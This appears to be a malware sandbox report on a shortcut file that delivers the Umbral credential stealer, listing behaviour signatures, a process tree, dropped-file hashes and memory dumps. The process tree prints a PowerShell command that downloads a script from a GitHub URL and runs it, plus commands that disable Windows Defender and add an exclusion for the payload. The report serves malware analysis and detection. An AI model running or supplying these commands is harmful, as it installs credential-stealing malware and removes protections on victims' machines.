Overview

overview

10

Static

static

1

1231321312.lnk

windows10-2004-x64

10

Resubmissions

23/03/2025, 14:55

250323-san3jsyjv6 10

23/03/2025, 14:54

250323-r9t76sxr17 10

23/03/2025, 14:51

250323-r74zlaxrv8 10

Analysis

  • max time kernel
    10s
  • max time network
    10s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/03/2025, 14:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1231321312.lnk

  • Size

    2KB

  • MD5

    a83ed03220cbc79bcbcaae9a57d0b95a

  • SHA1

    062d88505a421b491c8614ccff1d8fdd34453e18

  • SHA256

    c30599a71b6129c75b93e7b508cc307928df2677fe1b00357547481662522033

  • SHA512

    97f7b63aa0435cbe3fb597f3a18941d0697c053ff75ccfdfae55f2e0f70afde85e6ef82e0c90077dcbc933247b8ac568f1fd28a7b3cc1f0eb1af9640f409a349

Score
10/10
umbralexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Powershell Invoke Web Request.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\1231321312.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4924
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1' -UseBasicParsing).Content"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5476
      • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5428
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1372
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1160
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5524
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1396
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
            PID:5404
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:4204
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            4⤵
            • Detects videocard installed
            PID:5228

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      556084f2c6d459c116a69d6fedcc4105

      SHA1

      633e89b9a1e77942d822d14de6708430a3944dbc

      SHA256

      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

      SHA512

      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      d0744ae10dfb4e478d9126b3bcaed1f8

      SHA1

      ef7dc64d087ab242fbe4bd699f77c2ca46eedf3e

      SHA256

      10ee655a08c2e704dc1f6840997a80e50ffedc19a35a13009f3c62223e7b28af

      SHA512

      3ae25ee6fd4b7810f85cdd0fb81da1a34c481be82bd908abcb022fc8f24392342637670dd01b0e84e933e96e2cecfd1fd27b76ac3502c08f44f9f342d987d8e4

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      2c1a3a6f455a6fe61abc847cb464fb63

      SHA1

      a40a850408ffcb6d524ff723b637f8817b034d9c

      SHA256

      61fd62153ebeaba4ee60d920b536320cffde754e25626ccb0ea65061050a7d63

      SHA512

      15e32523649f2bb53d7e576fc97682427ba14765bbe36ce07aede0a1aeb1a1f150cf4566cdf28049abcf8149616f4874fa6a41e2206aded818aec8ffbdf755b9

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      948B

      MD5

      74a6b79d36b4aae8b027a218bc6e1af7

      SHA1

      0350e46c1df6934903c4820a00b0bc4721779e5f

      SHA256

      60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04

      SHA512

      60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      Filesize

      227KB

      MD5

      68b35208a6ccc5cf6cfa41f86712e7ab

      SHA1

      34c735c3cc8fd7f9d225cd7323e5632aa772f465

      SHA256

      4a7c61f2655323ab50ae5d82063c96f5f8bad0ea39c0e6895b6354668b425279

      SHA512

      f05d7f10ee0a9ebef78696c86ec8f973242aafba3004cd6ee753b8ca44916b898befcca907b27ec711db60bb5141dc57cf36a00545cf4253136e1ecb63194f3f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v2yxq1l2.wz5.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/5428-30-0x000001E0955D0000-0x000001E095610000-memory.dmp

      Filesize

      256KB

      Download

    • memory/5428-55-0x000001E0AFA80000-0x000001E0AFAD0000-memory.dmp

      Filesize

      320KB

      Download

    • memory/5428-56-0x000001E0AFDC0000-0x000001E0AFE36000-memory.dmp

      Filesize

      472KB

      Download

    • memory/5428-57-0x000001E0AFA30000-0x000001E0AFA4E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/5428-65-0x000001E0AFD40000-0x000001E0AFD52000-memory.dmp

      Filesize

      72KB

      Download

    • memory/5428-64-0x000001E0AFA60000-0x000001E0AFA6A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/5476-16-0x00007FFA2ECD0000-0x00007FFA2F791000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5476-2-0x00007FFA2ECD3000-0x00007FFA2ECD5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/5476-31-0x00007FFA2ECD0000-0x00007FFA2F791000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5476-15-0x00007FFA2ECD0000-0x00007FFA2F791000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5476-14-0x00007FFA2ECD0000-0x00007FFA2F791000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5476-13-0x00007FFA2ECD0000-0x00007FFA2F791000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5476-3-0x00000197F9170000-0x00000197F9192000-memory.dmp

      Filesize

      136KB

      Download